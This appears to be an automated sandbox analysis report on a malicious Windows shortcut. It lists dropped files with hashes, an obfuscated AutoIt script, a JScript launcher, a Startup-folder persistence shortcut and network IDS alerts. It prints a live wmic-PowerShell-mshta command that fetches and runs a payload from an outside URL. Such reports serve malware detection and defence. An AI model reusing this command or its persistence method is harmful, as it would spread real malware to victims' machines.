                                                                                                                  Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):29752
                                                                                                                  Entropy (8bit):5.4030778570616524
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cb7cbSIkmcbl:ceo4+rsCmkp
                                                                                                                  MD5:0EEE66FD8068B10002BC42EED6F83CF7
                                                                                                                  SHA1:958B421FC44B5C47644354961722BB052EBAF32C
                                                                                                                  SHA-256:967BB8A4A136169253A8C5056671419446B9E352BBAA4EA532D3963186E49E2B
                                                                                                                  SHA-512:F55DDDFDC8E4607431BBDEB79D256EF974A4905FE8DE6FE353B903F61C1B9F69E5F67235D1B608F56B17AD99280EDEE82C028FCCE5F796333F7CEE707ACAB446
                                                                                                                  Malicious:false
                                                                                                                  Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-

                                                                                                                  C:\Users\user\AppData\Local\WordGenius Technologies\G

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                  File Type:ASCII text, with very long lines (1266)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1150516
                                                                                                                  Entropy (8bit):5.1985967980924315
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:D8V+jcfSplhi959S1mg+PL9KBZ9kt41MgsUWiOl08zHBhk/d:DcElo59TZAZ9ssWDphk1
                                                                                                                  MD5:55D1A9399574865BEBB619F4657D1701
                                                                                                                  SHA1:AB34EFF18C5446892E0F0F5910BE6E245305CF99
                                                                                                                  SHA-256:A3EAEC0D05B9C829161AAF5D6A27AD5B434D4BE6F5A51376467968413B30749E
                                                                                                                  SHA-512:BFB3A5543E2152AE7D9B3F7D81FF67C7B07213BFBB2C59397328A106882340CC4BB1A996CF5D3C9633634F512EAB3872379927402B983520F0D0439E127A1AE9
                                                                                                                  Malicious:false
                                                                                                                  Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]

                                                                                                                  C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):186
                                                                                                                  Entropy (8bit):4.761058342183721
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:RiMIpGXfeNH5E5wWAX+TSyCVVh4EkD5yKXW/Zi+0/RaMl85uWAX+TSyCVVh4EkDO:RiJbNHCwWDmLJkDrXW/Zz0tl8wWDmLJX
                                                                                                                  MD5:6B09F9AC501B58CCD5BC08B41FF85624
                                                                                                                  SHA1:95272508F2347856331B1017A86F63B5F87FCD68
                                                                                                                  SHA-256:D5F306EB2125F34C25704C8B9611AA1367A772EF02D7BAA1789D8C7026D17BE6
                                                                                                                  SHA-512:721BD6DA01A3DC639958E2D801C1A10B7E0B9D4363B4182219BD6261737D67B172236DC2C651DC753DC91DE6CEB94B74977E8EF1578A262EF5D27A6DC2F428D2
                                                                                                                  Malicious:true
                                                                                                                  Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")

                                                                                                                  C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):893608
                                                                                                                  Entropy (8bit):6.62028134425878
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                  MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                  SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                  SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Roaming\BnQwAP.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1083904
                                                                                                                  Entropy (8bit):6.306372955812324
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:XrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaA1v:X2EYTb8atv1orq+pEiSDTj1VyvBay
                                                                                                                  MD5:9624FB616EDBE0DBAFD24F26424CA9E8
                                                                                                                  SHA1:4038ACA3595AD6604148DEF2BEEDB6AD72FCC4E7
                                                                                                                  SHA-256:E507B2CF8FE1A856187F471A08AF108388F2A8753AF5AF0EFF1937073428A07C
                                                                                                                  SHA-512:A9E8FB10337A3811D0FE37B51598834A746C7887F4617C7BF7BB9F963DE7EC7A612E7C103B8E7EE2B89B1816182EE33D9BC5A07D5108AF5DA228733BACA4C188
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..*PG."(..PG.+PF..RG..9I.{PG..9D.*PG..9..*PG.+P.*PG..9E.*PG.Rich+PG.........................PE..d.../.gg.........."......4...R.......T.........@..........................................`...@...............@..............................\..|........A...@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...|..............@....pdata..Ho...@...p..................@..@.rsrc....A.......B...<..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Roaming\Job_Description.pdf

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PDF document, version 1.6
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3438614
                                                                                                                  Entropy (8bit):7.565365361527372
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:GtZNvjFRGx8mEuSEEBWfJoGnihnR3YSnyYbAYFdhzQCnGkH:GtZJFRGxZEuSEEBE6GkR3YSnyuFsXkH
                                                                                                                  MD5:13E442980DFB1FED9EE67DD9CE5C165D
                                                                                                                  SHA1:958D4B5F59CF46E817461DD2C67CDE1106FFE508
                                                                                                                  SHA-256:3D80994983233EE77AF8200DC292C95D12AD7DF091BB3FB83DA6613CE74D6CCE
                                                                                                                  SHA-512:AE9A6CEE5FAC67C3623EC5F51FF053BA47B9B4C0F811FDDA9DF290AF53923F3184771F31E1F62F889164508334E1C44407EBF0DC038FC116C1A7826625E0FE2F
                                                                                                                  Malicious:false
                                                                                                                  Preview:%PDF-1.6.%.....1 0 obj.<<./Type /Catalog./Version /1.6./Pages 2 0 R.>>.endobj.6 0 obj.<<./Length 526549./Type /XObject./Subtype /Image./Filter /DCTDecode./BitsPerComponent 8./Width 2480./Height 3508./ColorSpace /DeviceRGB.>>.stream.......+Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS6 (Windows).2024:12:13 16:15:59..................................................................................&.(.........................................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................q.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5.

                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):99
                                                                                                                  Entropy (8bit):4.943821049972357
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:HRAbABGQaFyw3pYoCHyg4E2J5yKXW/Zi+URAAy:HRYF5yjoCHhJ23yKXW/Zzyy
                                                                                                                  MD5:837A8AFA0534369AF64741AFD86F5093
                                                                                                                  SHA1:7569D32D0ADD2EEE25705C4BC101B7898D357370
                                                                                                                  SHA-256:C13B04EFBFBFB63EE7B34BB6DD95A7C433C3A81BB08BCB3DE97334D2146EFB81
                                                                                                                  SHA-512:5A34E5614CD2E6E034FD4F3E5065E4F22E7B5BA7B3EED6A5E693C3291ED6C4717DCCEE898BB98547BE6F09277D1CAD8DDA4C104E318E4D5971D67B63405D9910
                                                                                                                  Malicious:true
                                                                                                                  Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..

                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):2464
                                                                                                                  Entropy (8bit):3.2444115126717215
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:QOaqdmuF3rHlp+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVM:FaqdF7Fp+AAHdKoqKFxcxkFfj
                                                                                                                  MD5:725CE985A995686F5BD1F350325641C9
                                                                                                                  SHA1:51B43AAD2EE2E56DBC384FCFD9AA3131A5876380
                                                                                                                  SHA-256:6EC6E55FB8FF45AB9F29967CAF49A7DA3C51D16A12949CF8511A6851FD9D7168
                                                                                                                  SHA-512:E7B8246AC37DA265A6ABA1D32B5DC613EB97BA96A91BA57B8FE6F302E97984575E60F39D6B1754D156F35E74A8A13088FE97003399CE6B9CE02C37D1B1566B97
                                                                                                                  Malicious:false
                                                                                                                  Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. M.o.n. .. D.e.c. .. 2.3. .. 2.0.2.4. .0.1.:.0.8.:.3.1.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

                                                                                                                  \Device\ConDrv

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):160
                                                                                                                  Entropy (8bit):5.083203110114614
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MghcV4oO6JQAiveyn:Yw7gJGWMXJXKSOdYiygKkXe/egKVldeF
                                                                                                                  MD5:7DCEEBAC7525469D3B0D7EB73B62F6C2
                                                                                                                  SHA1:CF1114FB069D13D948E4D5518CB3D4C331422B9E
                                                                                                                  SHA-256:B9EC374FDCF97E09BD6E212DE87EA708D16A3BBD0465C80FAAD9046D84A554DB
                                                                                                                  SHA-512:71BC58668CB933C7C23FB68B91C24E607EAA4952536BCBC39EE6ACA4765C332B93157C5E63420B7615A4D07D5C9539CBF2AECAB7176DDD1A2105F4A24A7F3336
                                                                                                                  Malicious:false
                                                                                                                  Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 3904;...ReturnValue = 0;..};....

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                                  Entropy (8bit):2.6407269520113723
                                                                                                                  TrID:
                                                                                                                  • Windows Shortcut (20020/1) 100.00%
                                                                                                                  File name:lKin1m7Pf2.lnk
                                                                                                                  File size:1'912 bytes
                                                                                                                  MD5:2ddf3f1022cce6aa5fd6c09b5275e47e
                                                                                                                  SHA1:13c4b35087244077015a33b25d2ab5f054f44988
                                                                                                                  SHA256:7ffbec4e1d8aacb3a386573d2c90ab9d1d89605a82ecd7dc524c178377ac6043
                                                                                                                  SHA512:bbdd716176b4f320d464972bbb519064a37ce457378d93275047dcb02588f3b3740b15cef0771a0a0758723428bf52bcda505fc1e3f84261a8fbab9426bb8c72
                                                                                                                  SSDEEP:24:8AyH/BUlgKN4ee+/31kWNdk6Zoc6dhqdd79dsrabqyI+pu:89uGep1ldkU6dMdJ9Aaey3w
                                                                                                                  TLSH:62415E041AE94B20F3B78E72547AB321897F7C5ADD728F1C018186892532A20E875F6B
                                                                                                                  File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:72d282828e8d8dd5

                                                                                                                  Static Windows Shortcut Info

                                                                                                                  General

                                                                                                                  Relative Path:..\..\..\..\Windows\System32\Wbem\wmic.exe
                                                                                                                  Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')"
                                                                                                                  Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-12-23T07:07:55.769895+01002026434ET MALWARE VBScript Redirect Style Exe File Download1147.45.49.155443192.168.2.849704TCP
                                                                                                                  2024-12-23T07:08:09.118490+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849713147.45.49.155443TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 23, 2024 07:07:53.199685097 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:53.199719906 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:53.199794054 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:53.220592976 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:53.220614910 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:54.740962029 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:54.741036892 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:54.741059065 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:54.821228027 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:54.821254969 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:54.821625948 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:54.821736097 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:54.826458931 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:54.867341995 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.348973989 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.349117041 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.542962074 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.542979002 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.543014050 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.543068886 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.543081999 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.543111086 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.543132067 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.598344088 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.598397970 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.598475933 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.598494053 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.598521948 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.598543882 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.738286018 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.738342047 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.738396883 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.738415003 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.738449097 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.738466978 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.769953012 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.769998074 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.770032883 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.770047903 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.770102978 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.770102978 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.800700903 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.800765038 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.800800085 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.800822020 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.800847054 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.800865889 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.850990057 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.851038933 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.851073027 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.851089001 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.851119995 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.851140976 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.939480066 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.939533949 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.939568996 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.939585924 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.939618111 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.939632893 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.958456039 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.958514929 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.958545923 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.958561897 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.958580017 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.958600044 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.977612972 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.977673054 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.977725029 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.977740049 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.977777004 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.977796078 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.989862919 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.989877939 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.989949942 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.989965916 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:55.989975929 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:55.990003109 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.001914024 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.001933098 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.002011061 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.002026081 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.002067089 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.038110018 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.038127899 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.038187027 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.038206100 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.038249969 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.124389887 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.124418020 CET44349704147.45.49.155192.168.2.8
